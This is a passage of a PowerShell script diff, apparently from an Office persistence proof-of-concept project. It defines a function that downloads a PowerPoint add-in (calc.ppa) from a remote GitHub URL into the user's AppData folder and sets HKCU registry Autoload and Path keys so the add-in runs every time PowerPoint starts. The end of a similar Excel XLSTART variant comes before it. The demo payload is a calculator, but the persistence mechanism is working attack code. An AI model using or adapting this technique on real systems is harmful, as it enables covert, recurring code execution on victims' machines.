"$env:APPDATA\Microsoft\Excel\XLSTART\calc.xlam" + $excelApp.Quit() +} + +Function PowerPointVBAadd-ins +{ + # Use add-ins for PowerPoint + # Release file:%appdata%\Microsoft\AddIns\calc.ppa + # Create registry key:HKCU\Software\Microsoft\Office\14.0\PowerPoint\AddIns\calc Autoload DWORD 1 + # Create registry key:HKCU\Software\Microsoft\Office\14.0\PowerPoint\AddIns\calc Path REG_SZ calc.ppa + # Pop up the calculator when you start powerpoint.exe + Try + { + $pptApp = New-Object -COMObject "PowerPoint.Application" + } + Catch + { + Write-Host "[!] I can't find Microsoft Office!" + Write-Host "[+] Please reset a correct path." + return + } + Invoke-WebRequest "https://github.com/3gstudent/Office-Persistence/raw/0374e2e712e3c12762c4dce29ed5ee97b2b73630/calc.ppa" -OutFile "$env:APPDATA\Microsoft\AddIns\calc.ppa" + $ver = $pptApp.version + $ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\calc" + New-Item -type Directory $ExcelRegPath -Force | Out-Null + New-ItemProperty $ExcelRegPath "Autoload" -value "1" -propertyType DWORD | Out-Null + New-ItemProperty $ExcelRegPath "Path" -value "calc.ppa" -propertyType string | Out-Null + $pptApp.Quit() +}